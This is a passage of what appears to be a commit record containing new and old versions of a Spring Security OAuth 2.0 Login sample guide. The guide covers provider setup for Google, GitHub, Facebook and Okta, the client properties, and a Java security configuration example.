http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#UserInfo[*UserInfo Endpoint*]\nand establish an _authenticated session_. The home page will then be displayed showing the user attributes retrieved from the UserInfo Endpoint, for example, name, email, profile, sub, etc.\n\n[[oauth2-login-auto-configuration]]\n== OAuth 2.0 Login auto-configuration\n\nAs you worked through this guide and set up OAuth 2.0 Login with one of the Providers,\nwe hope you noticed the ease in configuration and setup required in getting the sample up and running.\nAnd you may be asking, how does this all work? 
Thanks to some Spring Boot auto-configuration _magic_,\nwe were able to automatically register the OAuth Client(s) configured in the `Environment`,\nas well, provide a minimal security configuration for OAuth 2.0 Login.\n\nThe following provides an overview of the Spring Boot auto-configuration classes:\n\n[[client-registration-auto-configuration-class]]\n*_org.springframework.boot.autoconfigure.security.oauth2.client.ClientRegistrationAutoConfiguration_*::\n`ClientRegistrationAutoConfiguration` is responsible for registering a `ClientRegistrationRepository` _bean_ with the `ApplicationContext`.\nThe `ClientRegistrationRepository` is composed of one or more `ClientRegistration` instances, which are created from the OAuth client properties\nconfigured in the `Environment` that are prefixed with `security.oauth2.client.[client-key]`, for example, `security.oauth2.client.google`.\n\nNOTE: `ClientRegistrationAutoConfiguration` also loads a _resource_ named *oauth2-clients-defaults.yml*,\n which provides a set of default client property values for a number of _well-known_ Providers.\n More on this in the later section <<oauth2-default-client-properties, Default client property values>>.\n\n[[oauth2-login-auto-configuration-class]]\n*_org.springframework.boot.autoconfigure.security.oauth2.client.OAuth2LoginAutoConfiguration_*::\n`OAuth2LoginAutoConfiguration` is responsible for enabling OAuth 2.0 Login,\nonly if there is a `ClientRegistrationRepository` _bean_ available in the `ApplicationContext`.\n\nWARNING: The auto-configuration classes (and dependent resources) will eventually _live_ in the *Spring Boot Security Starter*.\n\n[[oauth2-client-properties]]\n=== OAuth client properties\n\nThe following specifies the common set of properties available for configuring an OAuth Client.\n\n[TIP]\n====\n- *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n- Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.google*.\n- At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n====\n\n- *client-authentication-method* - the method used to authenticate the _Client_ with the _Provider_. Supported values are *header* and *form*.\n- *authorized-grant-type* - the OAuth 2.0 Authorization Framework defines the https:\/\/tools.ietf.org\/html\/rfc6749#section-1.3.1[Authorization Code] grant type,\n which is used to realize the _\"authentication flow\"_. Currently, this is the only supported grant type.\n- *redirect-uri* - this is the client's _registered_ redirect URI that the _Authorization Server_ redirects the end-user's user-agent\n to after the end-user has authenticated and authorized access for the client.\n\nNOTE: The default redirect URI is _\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_, which leverages *URI template variables*.\n\n- *scopes* - a comma-delimited string of scope(s) requested during the _Authorization Request_ flow, for example: _openid, email, profile_\n\nNOTE: _OpenID Connect 1.0_ defines these http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#ScopeClaims[standard scopes]: _profile, email, address, phone_\n\nNOTE: Non-standard scopes may be defined by a standard _OAuth 2.0 Provider_. 
Please consult the Provider's OAuth API documentation to learn which scopes are supported.\n\n- *authorization-uri* - the URI used by the client to redirect the end-user's user-agent to the _Authorization Server_ in order to obtain authorization from the end-user (the _Resource Owner_).\n- *token-uri* - the URI used by the client when exchanging an _Authorization Grant_ (for example, Authorization Code) for an _Access Token_ at the _Authorization Server_.\n- *user-info-uri* - the URI used by the client to access the protected resource *UserInfo Endpoint*, in order to obtain attributes of the end-user.\n- *user-info-converter* - the `Converter` implementation class used to convert the *UserInfo Response* to a `UserInfo` (_OpenID Connect 1.0 Provider_) or `OAuth2User` instance (_Standard OAuth 2.0 Provider_).\n\nTIP: The `Converter` implementation class for an _OpenID Connect 1.0 Provider_ is *org.springframework.security.oauth2.client.user.converter.UserInfoConverter*\n and for a standard _OAuth 2.0 Provider_ it's *org.springframework.security.oauth2.client.user.converter.OAuth2UserConverter*.\n\n- *user-info-name-attribute-key* - the _key_ used to retrieve the *Name* of the end-user from the `Map` of available attributes in `UserInfo` or `OAuth2User`.\n\nNOTE: _OpenID Connect 1.0_ defines the http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#StandardClaims[*\"name\"* Claim], which is the end-user's full name and is the default used for `UserInfo`.\n\nIMPORTANT: Standard _OAuth 2.0 Providers_ may vary the naming of their *Name* attribute. Please consult the Provider's *UserInfo* API documentation.\n This is a *_required_* property when *user-info-converter* is set to `OAuth2UserConverter`.\n\n- *client-name* - this is a descriptive name used for the client. The name may be used in certain scenarios, for example, when displaying the name of the client in the _auto-generated login page_.\n- *client-alias* - an _alias_ which uniquely identifies the client. 
It *must be* unique within a `ClientRegistrationRepository`.\n\n[[oauth2-default-client-properties]]\n=== Default client property values\n\nAs noted previously, <<client-registration-auto-configuration-class, `ClientRegistrationAutoConfiguration`>> loads a _resource_ named *oauth2-clients-defaults.yml*,\nwhich provides a set of default client property values for a number of _well-known_ Providers.\n\nFor example, the *authorization-uri*, *token-uri*, *user-info-uri* rarely change for a Provider and therefore it makes sense to\nprovide a set of defaults in order to reduce the configuration required by the user.\n\nBelow are the current set of default client property values:\n\n.oauth2-clients-defaults.yml\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n google:\n client-authentication-method: header\n authorized-grant-type: authorization_code\n redirect-uri: \"{scheme}:\/\/{serverName}:{serverPort}{baseAuthorizeUri}\/{clientAlias}\"\n scopes: openid, email, profile\n authorization-uri: \"https:\/\/accounts.google.com\/o\/oauth2\/auth\"\n token-uri: \"https:\/\/accounts.google.com\/o\/oauth2\/token\"\n user-info-uri: \"https:\/\/www.googleapis.com\/oauth2\/v3\/userinfo\"\n user-info-converter: \"org.springframework.security.oauth2.client.user.converter.UserInfoConverter\"\n client-name: Google\n client-alias: google\n github:\n client-authentication-method: header\n authorized-grant-type: authorization_code\n redirect-uri: \"{scheme}:\/\/{serverName}:{serverPort}{baseAuthorizeUri}\/{clientAlias}\"\n scopes: user\n authorization-uri: \"https:\/\/github.com\/login\/oauth\/authorize\"\n token-uri: \"https:\/\/github.com\/login\/oauth\/access_token\"\n user-info-uri: \"https:\/\/api.github.com\/user\"\n user-info-converter: \"org.springframework.security.oauth2.client.user.converter.OAuth2UserConverter\"\n client-name: GitHub\n client-alias: github\n facebook:\n client-authentication-method: form\n authorized-grant-type: authorization_code\n redirect-uri: \"{scheme}:\/\/{serverName}:{serverPort}{baseAuthorizeUri}\/{clientAlias}\"\n scopes: public_profile, email\n authorization-uri: \"https:\/\/www.facebook.com\/v2.8\/dialog\/oauth\"\n token-uri: \"https:\/\/graph.facebook.com\/v2.8\/oauth\/access_token\"\n user-info-uri: \"https:\/\/graph.facebook.com\/me\"\n user-info-converter: \"org.springframework.security.oauth2.client.user.converter.OAuth2UserConverter\"\n client-name: Facebook\n client-alias: facebook\n okta:\n client-authentication-method: header\n authorized-grant-type: authorization_code\n redirect-uri: \"{scheme}:\/\/{serverName}:{serverPort}{baseAuthorizeUri}\/{clientAlias}\"\n scopes: openid, email, profile\n user-info-converter: \"org.springframework.security.oauth2.client.user.converter.UserInfoConverter\"\n client-name: Okta\n client-alias: okta\n----\n\n= Appendix\n'''\n\n[[configure-non-spring-boot-app]]\n== Configuring a _Non-Spring-Boot_ application\n\nIf you are not using Spring Boot for your application, you will not be able to leverage the auto-configuration features for OAuth 2.0 Login.\nYou will be required to provide your own _security configuration_ in order to enable OAuth 2.0 Login.\n\nThe following sample code demonstrates a minimal security configuration for enabling OAuth 2.0 Login.\n\nLet's assume we have a _properties file_ named *oauth2-clients.properties* on the _classpath_ and it specifies all the _required_ properties for an OAuth Client, specifically 
_Google_.\n\n.oauth2-clients.properties\n[source,properties]\n----\nsecurity.oauth2.client.google.client-id=${client-id}\nsecurity.oauth2.client.google.client-secret=${client-secret}\nsecurity.oauth2.client.google.client-authentication-method=header\nsecurity.oauth2.client.google.authorized-grant-type=authorization_code\nsecurity.oauth2.client.google.redirect-uri=http:\/\/localhost:8080\/oauth2\/authorize\/code\/google\nsecurity.oauth2.client.google.scopes=openid,email,profile\nsecurity.oauth2.client.google.authorization-uri=https:\/\/accounts.google.com\/o\/oauth2\/auth\nsecurity.oauth2.client.google.token-uri=https:\/\/accounts.google.com\/o\/oauth2\/token\nsecurity.oauth2.client.google.user-info-uri=https:\/\/www.googleapis.com\/oauth2\/v3\/userinfo\nsecurity.oauth2.client.google.user-info-converter=org.springframework.security.oauth2.client.user.converter.UserInfoConverter\nsecurity.oauth2.client.google.client-name=Google\nsecurity.oauth2.client.google.client-alias=google\n----\n\nThe following _security configuration_ will enable OAuth 2.0 Login using _Google_ as the _Authentication Provider_:\n\n[source,java]\n----\n@EnableWebSecurity\n@PropertySource(\"classpath:oauth2-clients.properties\")\npublic class SecurityConfig extends WebSecurityConfigurerAdapter {\n\tprivate Environment environment;\n\n\tpublic SecurityConfig(Environment environment) {\n\t\tthis.environment = environment;\n\t}\n\n\t@Override\n\tprotected void configure(HttpSecurity http) throws Exception {\n\t\thttp\n\t\t\t.authorizeRequests()\n\t\t\t\t.anyRequest().authenticated()\n\t\t\t\t.and()\n\t\t\t.oauth2Login()\n\t\t\t\t.clients(clientRegistrationRepository())\n\t\t\t\t.userInfoEndpoint()\n\t\t\t\t\t.userInfoTypeConverter(\n\t\t\t\t\t\tnew UserInfoConverter(),\n\t\t\t\t\t\tnew URI(\"https:\/\/www.googleapis.com\/oauth2\/v3\/userinfo\"));\n\t}\n\n\t@Bean\n\tpublic ClientRegistrationRepository clientRegistrationRepository() {\n\t\tList<ClientRegistration> clientRegistrations = Collections.singletonList(\n\t\t\tclientRegistration(\"security.oauth2.client.google.\"));\n\n\t\treturn new InMemoryClientRegistrationRepository(clientRegistrations);\n\t}\n\n\tprivate ClientRegistration clientRegistration(String clientPropertyKey) {\n\t\tString clientId = this.environment.getProperty(clientPropertyKey + \"client-id\");\n\t\tString clientSecret = this.environment.getProperty(clientPropertyKey + \"client-secret\");\n\t\tClientAuthenticationMethod clientAuthenticationMethod = ClientAuthenticationMethod.valueOf(\n\t\t\tthis.environment.getProperty(clientPropertyKey + \"client-authentication-method\").toUpperCase());\n\t\tAuthorizationGrantType authorizationGrantType = AuthorizationGrantType.valueOf(\n\t\t\tthis.environment.getProperty(clientPropertyKey + \"authorized-grant-type\").toUpperCase());\n\t\tString redirectUri = this.environment.getProperty(clientPropertyKey + \"redirect-uri\");\n\t\tString[] scopes = this.environment.getProperty(clientPropertyKey + \"scopes\").split(\",\");\n\t\tString authorizationUri = this.environment.getProperty(clientPropertyKey + \"authorization-uri\");\n\t\tString tokenUri = this.environment.getProperty(clientPropertyKey + \"token-uri\");\n\t\tString userInfoUri = this.environment.getProperty(clientPropertyKey + \"user-info-uri\");\n\t\tString clientName = this.environment.getProperty(clientPropertyKey + \"client-name\");\n\t\tString clientAlias = this.environment.getProperty(clientPropertyKey + \"client-alias\");\n\n
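\t\t\/\/ Map the resolved properties onto a ClientRegistration: the client-id is the builder's\n\t\t\/\/ constructor argument and the remaining attributes are set fluently below.\n\t\treturn new 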
ClientRegistration.Builder(clientId)\n\t\t\t.clientSecret(clientSecret)\n\t\t\t.clientAuthenticationMethod(clientAuthenticationMethod)\n\t\t\t.authorizedGrantType(authorizationGrantType)\n\t\t\t.redirectUri(redirectUri)\n\t\t\t.scopes(scopes)\n\t\t\t.authorizationUri(authorizationUri)\n\t\t\t.tokenUri(tokenUri)\n\t\t\t.userInfoUri(userInfoUri)\n\t\t\t.clientName(clientName)\n\t\t\t.clientAlias(clientAlias)\n\t\t\t.build();\n\t}\n}\n----\n","old_contents":"= OAuth 2.0 Login Sample\nJoe Grandja\n:toc:\n:security-site-url: https:\/\/projects.spring.io\/spring-security\/\n\n[.lead]\nThis guide will walk you through the steps for setting up the sample application with OAuth 2.0 Login using an external _OAuth 2.0_ or _OpenID Connect 1.0_ Provider.\nThe sample application is built with *Spring Boot 1.5* and the *spring-security-oauth2-client* module that is new in {security-site-url}[Spring Security 5.0].\n\nThe following sections outline detailed steps for setting up OAuth 2.0 Login with these Providers:\n\n* <<google-login, Google>>\n* <<github-login, GitHub>>\n* <<facebook-login, Facebook>>\n* <<okta-login, Okta>>\n\nNOTE: The _\"authentication flow\"_ is realized using the *Authorization Code Grant*, as specified in the https:\/\/tools.ietf.org\/html\/rfc6749#section-4.1[OAuth 2.0 Authorization Framework].\n\n[[sample-app-content]]\n== Sample application content\n\nThe sample application contains the following package structure and artifacts:\n\n*sample*\n\n[circle]\n* _OAuth2LoginApplication_ - the main class for the _Spring application_.\n** *user*\n*** _GitHubOAuth2User_ - a custom _UserInfo_ type for <<github-login, GitHub Login>>.\n** *web*\n*** _MainController_ - the root controller that displays user information after a successful login.\n\n*org.springframework.boot.autoconfigure.security.oauth2.client*\n\n[circle]\n* <<client-registration-auto-configuration-class, _ClientRegistrationAutoConfiguration_>> - a Spring Boot auto-configuration class\n that automatically registers a _ClientRegistrationRepository_ bean in the _ApplicationContext_.\n* <<oauth2-login-auto-configuration-class, _OAuth2LoginAutoConfiguration_>> - a Spring Boot auto-configuration class that automatically enables OAuth 2.0 Login.\n\nWARNING: The Spring Boot auto-configuration classes (and dependent resources) will eventually _live_ in the *Spring Boot Security Starter*.\n\nNOTE: See <<oauth2-login-auto-configuration, OAuth 2.0 Login auto-configuration>> for a detailed overview of the auto-configuration classes.\n\n[[google-login]]\n== Setting up *_Login with Google_*\n\nThe goal for this section of the guide is to setup login using Google as the _Authentication Provider_.\n\nNOTE: https:\/\/developers.google.com\/identity\/protocols\/OpenIDConnect[Google's OAuth 2.0 implementation] for authentication conforms to the\n http:\/\/openid.net\/connect\/[OpenID Connect] specification and is http:\/\/openid.net\/certification\/[OpenID Certified].\n\n[[google-login-register-credentials]]\n=== Register OAuth 2.0 credentials\n\nIn order to use Google's OAuth 2.0 authentication system for login, you must set up a project in the *Google API Console* to obtain OAuth 2.0 credentials.\n\nFollow the instructions on the https:\/\/developers.google.com\/identity\/protocols\/OpenIDConnect[OpenID Connect] page starting in the section *_\"Setting up OAuth 2.0\"_*.\n\nAfter completing the sub-section, *_\"Obtain OAuth 2.0 credentials\"_*, you should have created a new *OAuth Client* with credentials consisting of a *Client ID* and 
*Client Secret*.\n\n[[google-login-redirect-uri]]\n=== Setting the redirect URI\n\nThe redirect URI is the path in the sample application that the end-user's user-agent is redirected back to after they have authenticated with Google\nand have granted access to the OAuth Client _(created from the <<google-login-register-credentials, previous step>>)_ on the *Consent screen* page.\n\nFor the sub-section, *_\"Set a redirect URI\"_*, ensure the *Authorised redirect URIs* is set to *http:\/\/localhost:8080\/oauth2\/authorize\/code\/google*\n\nTIP: The default redirect URI is *_\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_*.\n See <<oauth2-client-properties, OAuth client properties>> for more details on this default.\n\n[[google-login-configure-application-yml]]\n=== Configuring application.yml\n\nNow that we have created a new OAuth Client with Google, we need to configure the sample application to use this OAuth Client for the _authentication flow_.\n\nGo to *_src\/main\/resources_* and edit *application.yml*. Add the following configuration:\n\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n google:\n client-id: ${client-id}\n client-secret: ${client-secret}\n----\n\nReplace *${client-id}* and *${client-secret}* with the OAuth 2.0 credentials created in the previous section <<google-login-register-credentials, Register OAuth 2.0 credentials>>.\n\n[TIP]\n.OAuth client properties\n====\n. *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n. Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.google*.\n. At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n A list of these properties are detailed in <<oauth2-client-properties, OAuth client properties>>.\n====\n\n[[google-login-run-sample]]\n=== Running the sample\n\nLaunch the Spring Boot application by running *_sample.OAuth2LoginApplication_*.\n\nAfter the application successfully starts up, go to http:\/\/localhost:8080. 
You'll then be redirected to http:\/\/localhost:8080\/login, which will display an _auto-generated login page_ with an anchor link for *Google*.\n\nClick through on the Google link and you'll be redirected to Google for authentication.\n\nAfter you authenticate using your Google credentials, the next page presented to you will be the *Consent screen*.\nThe Consent screen will ask you to either *_Allow_* or *_Deny_* access to the OAuth Client you created in the previous step <<google-login-register-credentials, Register OAuth 2.0 credentials>>.\nClick *_Allow_* to authorize the OAuth Client to access your _email address_ and _basic profile_ information.\n\nAt this point, the OAuth Client will retrieve your email address and basic profile information from the http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#UserInfo[*UserInfo Endpoint*] and establish an _authenticated session_.\nThe home page will then be displayed showing the user attributes retrieved from the UserInfo Endpoint, for example, name, email, profile, sub, etc.\n\n[[github-login]]\n== Setting up *_Login with GitHub_*\n\nThe goal for this section of the guide is to setup login using GitHub as the _Authentication Provider_.\n\nNOTE: https:\/\/developer.github.com\/v3\/oauth\/[GitHub's OAuth 2.0 implementation] supports the standard\n https:\/\/tools.ietf.org\/html\/rfc6749#section-4.1[authorization code grant type].\n However, it *does not* implement the _OpenID Connect 1.0_ specification.\n\n[[github-login-register-application]]\n=== Register OAuth application\n\nIn order to use GitHub's OAuth 2.0 authentication system for login, you must https:\/\/github.com\/settings\/applications\/new[_Register a new OAuth application_].\n\nWhile registering your application, ensure the *Authorization callback URL* is set to *http:\/\/localhost:8080\/oauth2\/authorize\/code\/github*.\n\nNOTE: The *Authorization callback URL* (or redirect URI) is the path in the sample application that the end-user's user-agent is redirected back to after they have authenticated with GitHub\n and have granted access to the OAuth application on the *Authorize application* page.\n\nTIP: The default redirect URI is *_\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_*.\n See <<oauth2-client-properties, OAuth client properties>> for more details on this default.\n\nAfter completing the registration, you should have created a new *OAuth Application* with credentials consisting of a *Client ID* and *Client Secret*.\n\n[[github-login-configure-application-yml]]\n=== Configuring application.yml\n\nNow that we have created a new OAuth application with GitHub, we need to configure the sample application to use this OAuth application (client) for the _authentication flow_.\n\nGo to *_src\/main\/resources_* and edit *application.yml*. Add the following configuration:\n\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n github:\n client-id: ${client-id}\n client-secret: ${client-secret}\n----\n\nReplace *${client-id}* and *${client-secret}* with the OAuth 2.0 credentials created in the previous section <<github-login-register-application, Register OAuth application>>.\n\n[TIP]\n.OAuth client properties\n====\n. *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n. Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.github*.\n. 
At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n A list of these properties are detailed in <<oauth2-client-properties, OAuth client properties>>.\n====\n\n[[github-login-run-sample]]\n=== Running the sample\n\nLaunch the Spring Boot application by running *_sample.OAuth2LoginApplication_*.\n\nAfter the application successfully starts up, go to http:\/\/localhost:8080. You'll then be redirected to http:\/\/localhost:8080\/login, which will display an _auto-generated login page_ with an anchor link for *GitHub*.\n\nClick through on the GitHub link and you'll be redirected to GitHub for authentication.\n\nAfter you authenticate using your GitHub credentials, the next page presented to you is *Authorize application*.\nThis page will ask you to *Authorize* the application you created in the previous step <<github-login-register-application, Register OAuth application>>.\nClick *_Authorize application_* to allow the OAuth application to access your _Personal user data_ information.\n\nAt this point, the OAuth application will retrieve your personal user information from the *UserInfo Endpoint* and establish an _authenticated session_.\nThe home page will then be displayed showing the user attributes retrieved from the UserInfo Endpoint, for example, id, name, email, login, etc.\n\nTIP: For detailed information returned from the *UserInfo Endpoint* see the API documentation\n for https:\/\/developer.github.com\/v3\/users\/#get-the-authenticated-user[_Get the authenticated user_].\n\n[[facebook-login]]\n== Setting up *_Login with Facebook_*\n\nThe goal for this section of the guide is to setup login using Facebook as the _Authentication Provider_.\n\nNOTE: Facebook provides support for developers to https:\/\/developers.facebook.com\/docs\/facebook-login\/manually-build-a-login-flow[_Manually Build a Login Flow_].\n The _login flow_ uses browser-based redirects, which essentially implements the https:\/\/tools.ietf.org\/html\/rfc6749#section-4.1[authorization code grant type].\n (NOTE: Facebook partially implements the _OAuth 2.0 Authorization Framework_, however, it *does not* implement the _OpenID Connect 1.0_ specification.)\n\n[[facebook-login-register-application]]\n=== Add a New App\n\nIn order to use Facebook's OAuth 2.0 authentication system for login, you must first https:\/\/developers.facebook.com\/apps[_Add a New App_].\n\nAfter clicking _\"Create a New App\"_, the _\"Create a New App ID\"_ page is presented. Enter the Display Name, Contact Email, Category and then click _\"Create App ID\"_.\n\nNOTE: The selection for the _Category_ field is not relevant but it's a required field - select _\"Local\"_.\n\nThe next page presented is _\"Product Setup\"_. Click the _\"Get Started\"_ button for the *_Facebook Login_* product. 
In the left sidebar, under *_Products -> Facebook Login_*, select *_Settings_*.\n\nFor the field *Valid OAuth redirect URIs*, enter *http:\/\/localhost:8080\/oauth2\/authorize\/code\/facebook* then click _\"Save Changes\"_.\n\nNOTE: The *OAuth redirect URI* is the path in the sample application that the end-user's user-agent is redirected back to after they have authenticated with Facebook\n and have granted access to the application on the *Authorize application* page.\n\nTIP: The default redirect URI is *_\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_*.\n See <<oauth2-client-properties, OAuth client properties>> for more details on this default.\n\nYour application has now been assigned new OAuth 2.0 credentials under *App ID* and *App Secret*.\n\n[[facebook-login-configure-application-yml]]\n=== Configuring application.yml\n\nNow that we have created a new application with Facebook, we need to configure the sample application to use this application (client) for the _authentication flow_.\n\nGo to *_src\/main\/resources_* and edit *application.yml*. Add the following configuration:\n\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n facebook:\n client-id: ${app-id}\n client-secret: ${app-secret}\n----\n\nReplace *${app-id}* and *${app-secret}* with the OAuth 2.0 credentials created in the previous section <<facebook-login-register-application, Add a New App>>.\n\n[TIP]\n.OAuth client properties\n====\n. *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n. Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.facebook*.\n. At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n A list of these properties are detailed in <<oauth2-client-properties, OAuth client properties>>.\n====\n\n[[facebook-login-run-sample]]\n=== Running the sample\n\nLaunch the Spring Boot application by running *_sample.OAuth2LoginApplication_*.\n\nAfter the application successfully starts up, go to http:\/\/localhost:8080. 
You'll then be redirected to http:\/\/localhost:8080\/login, which will display an _auto-generated login page_ with an anchor link for *Facebook*.\n\nClick through on the Facebook link and you'll be redirected to Facebook for authentication.\n\nAfter you authenticate using your Facebook credentials, the next page presented to you will be *Authorize application*.\nThis page will ask you to *Authorize* the application you created in the previous step <<facebook-login-register-application, Add a New App>>.\nClick *_Authorize application_* to allow the OAuth application to access your _public profile_ and _email address_.\n\nAt this point, the OAuth application will retrieve your personal user information from the *UserInfo Endpoint* and establish an _authenticated session_.\nThe home page will then be displayed showing the user attributes retrieved from the UserInfo Endpoint, for example, id, name, etc.\n\n[[okta-login]]\n== Setting up *_Login with Okta_*\n\nThe goal for this section of the guide is to setup login using Okta as the _Authentication Provider_.\n\nNOTE: http:\/\/developer.okta.com\/docs\/api\/resources\/oidc.html[Okta's OAuth 2.0 implementation] for authentication conforms to the\n http:\/\/openid.net\/connect\/[OpenID Connect] specification and is http:\/\/openid.net\/certification\/[OpenID Certified].\n\nIn order to use Okta's OAuth 2.0 authentication system for login, you must first https:\/\/www.okta.com\/developer\/signup[create a developer account].\n\n[[okta-login-add-auth-server]]\n=== Add Authorization Server\n\nSign in to your account _sub-domain_ and click on the _\"Admin\"_ button to navigate to the administration page.\nFrom the top menu bar on the administration page, navigate to *_Security -> API_* and then click on the _\"Add Authorization Server\"_ button.\nFrom the _\"Add Authorization Server\"_ page, enter the Name, Resource URI, Description (optional) and then click _\"Save\"_.\n\nNOTE: The Resource URI field is not relevant but it's a required field - enter _\"http:\/\/localhost:8080\/oauth2\/okta\"_.\n\nThe next page presented is the _\"Settings\"_ for the new Authorization Server.\nIn the next step, we will create a new application that will be assigned OAuth 2.0 client credentials and registered with the Authorization Server.\n\n[[okta-login-register-application]]\n=== Add Application\n\nFrom the top menu bar on the administration page, navigate to *_Applications -> Applications_* and then click on the _\"Add Application\"_ button.\nFrom the _\"Add Application\"_ page, click on the _\"Create New App\"_ button and enter the following:\n\n* *Platform:* Web\n* *Sign on method:* OpenID Connect\n\nClick on the _\"Create\"_ button.\nOn the _\"General Settings\"_ page, enter the Application Name (for example, _\"Spring Security Okta Login\"_) and then click on the _\"Next\"_ button.\nOn the _\"Configure OpenID Connect\"_ page, enter *http:\/\/localhost:8080\/oauth2\/authorize\/code\/okta* for the field *Redirect URIs* and then click _\"Finish\"_.\n\nNOTE: The *Redirect URI* is the path in the sample application that the end-user's user-agent is redirected back to after they have authenticated with Okta\n and have granted access to the application on the *Authorize application* page.\n\nTIP: The default redirect URI is *_\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_*.\n See <<oauth2-client-properties, OAuth client properties>> for more details on this default.\n\nThe next page presented displays the _\"General\"_ tab selected 
for the application.\nThe _\"General\"_ tab displays the _\"Settings\"_ and _\"Client Credentials\"_ used by the application.\nIn the next step, we will _assign_ the application to _people_ in order to grant user(s) access to the application.\n\n[[okta-login-assign-application-people]]\n=== Assign Application to People\n\nFrom the _\"General\"_ tab of the application, select the _\"People\"_ tab and then click on the _\"Assign to People\"_ button.\nAssign your account to the application and then click on the _\"Save and Go Back\"_ button.\n\n[[okta-login-configure-application-yml]]\n=== Configuring application.yml\n\nNow that we have created a new application with Okta, we need to configure the sample application (client) for the _authentication flow_.\n\nGo to *_src\/main\/resources_* and edit *application.yml*. Add the following configuration:\n\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n okta:\n client-id: ${client-id}\n client-secret: ${client-secret}\n authorization-uri: https:\/\/${account-subdomain}.oktapreview.com\/oauth2\/v1\/authorize\n token-uri: https:\/\/${account-subdomain}.oktapreview.com\/oauth2\/v1\/token\n user-info-uri: https:\/\/${account-subdomain}.oktapreview.com\/oauth2\/v1\/userinfo\n----\n\nReplace *${client-id}* and *${client-secret}* with the *client credentials* created in the previous section <<okta-login-register-application, Add Application>>.\nAs well, replace *${account-subdomain}* in _authorization-uri_, _token-uri_ and _user-info-uri_ with the *sub-domain* assigned to your account during the registration process.\n\n[TIP]\n.OAuth client properties\n====\n. *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n. Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.okta*.\n. At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n A list of these properties are detailed in <<oauth2-client-properties, OAuth client properties>>.\n====\n\n[[okta-login-run-sample]]\n=== Running the sample\n\nLaunch the Spring Boot application by running *_sample.OAuth2LoginApplication_*.\n\nAfter the application successfully starts up, go to http:\/\/localhost:8080. You'll then be redirected to http:\/\/localhost:8080\/login, which will display an _auto-generated login page_ with an anchor link for *Okta*.\n\nClick through on the Okta link and you'll be redirected to Okta for authentication.\n\nAfter you authenticate using your Okta credentials, the OAuth Client (application) will retrieve your email address and basic profile information from the http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#UserInfo[*UserInfo Endpoint*]\nand establish an _authenticated session_. The home page will then be displayed showing the user attributes retrieved from the UserInfo Endpoint, for example, name, email, profile, sub, etc.\n\n[[oauth2-login-auto-configuration]]\n== OAuth 2.0 Login auto-configuration\n\nAs you worked through this guide and setup OAuth 2.0 Login with one of the Providers,\nwe hope you noticed the ease in configuration and setup required in getting the sample up and running?\nAnd you may be asking, how does this all work? 
Thanks to some Spring Boot auto-configuration _magic_,\nwe were able to automatically register the OAuth Client(s) configured in the `Environment`,\nas well, provide a minimal security configuration for OAuth 2.0 Login.\n\nThe following provides an overview of the Spring Boot auto-configuration classes:\n\n[[client-registration-auto-configuration-class]]\n*_org.springframework.boot.autoconfigure.security.oauth2.client.ClientRegistrationAutoConfiguration_*::\n`ClientRegistrationAutoConfiguration` is responsible for registering a `ClientRegistrationRepository` _bean_ with the `ApplicationContext`.\nThe `ClientRegistrationRepository` is composed of one or more `ClientRegistration` instances, which are created from the OAuth client properties\nconfigured in the `Environment` that are prefixed with `security.oauth2.client.[client-key]`, for example, `security.oauth2.client.google`.\n\nNOTE: `ClientRegistrationAutoConfiguration` also loads a _resource_ named *oauth2-clients-defaults.yml*,\n which provides a set of default client property values for a number of _well-known_ Providers.\n More on this in the later section <<oauth2-default-client-properties, Default client property values>>.\n\n[[oauth2-login-auto-configuration-class]]\n*_org.springframework.boot.autoconfigure.security.oauth2.client.OAuth2LoginAutoConfiguration_*::\n`OAuth2LoginAutoConfiguration` is responsible for enabling OAuth 2.0 Login,\nonly if there is a `ClientRegistrationRepository` _bean_ available in the `ApplicationContext`.\n\nWARNING: The auto-configuration classes (and dependent resources) will eventually _live_ in the *Spring Boot Security Starter*.\n\n[[oauth2-client-properties]]\n=== OAuth client properties\n\nThe following specifies the common set of properties available for configuring an OAuth Client.\n\n[TIP]\n====\n- *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n- Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.google*.\n- At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n====\n\n- *client-authentication-method* - the method used to authenticate the _Client_ with the _Provider_. Supported values are *header* and *form*.\n- *authorized-grant-type* - the OAuth 2.0 Authorization Framework defines the https:\/\/tools.ietf.org\/html\/rfc6749#section-1.3.1[Authorization Code] grant type,\n which is used to realize the _\"authentication flow\"_. Currently, this is the only supported grant type.\n- *redirect-uri* - this is the client's _registered_ redirect URI that the _Authorization Server_ redirects the end-user's user-agent\n to after the end-user has authenticated and authorized access for the client.\n\nNOTE: The default redirect URI is 